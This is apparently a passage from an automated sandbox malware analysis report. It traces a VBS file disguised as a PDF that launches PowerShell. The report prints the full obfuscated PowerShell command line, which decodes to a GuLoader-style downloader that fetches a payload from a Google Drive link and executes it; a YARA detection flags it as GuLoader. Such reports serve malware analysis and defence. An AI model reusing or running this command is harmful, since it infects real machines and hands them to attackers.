            Data Ascii: ha9dCf5egBQmt59cxa9S0VxkNEiHquIjgpzU8u3uCNlXDdGkhvqjeVvymhSdahAeNhr3MefS4ztfnsrZ2KGU44nRc+wOMq8YDm51eYTpd83x0/WAY4ldiUWvHQ8AHMAUXug4R3F1whcnnEcOkUwhXCJ51HoxvJKFDWtW7E6OhtuXQ6D6K+8VPeapi3pzrR4K0ncJp8Tp9s+a2ve6Cne/d+kym9gDIzSP3lqUCdIwo+9bvnUjiuun9/R2ghTtxNm



            Target ID:3
            Start time:03:58:59
            Start date:30/09/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
            Imagebase:0x7ff79f990000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:03:59:02
            Start date:30/09/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre 
e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A 
cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. 
Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
            Imagebase:0x7ff7b2bb0000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:03:59:02
            Start date:30/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff620390000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true
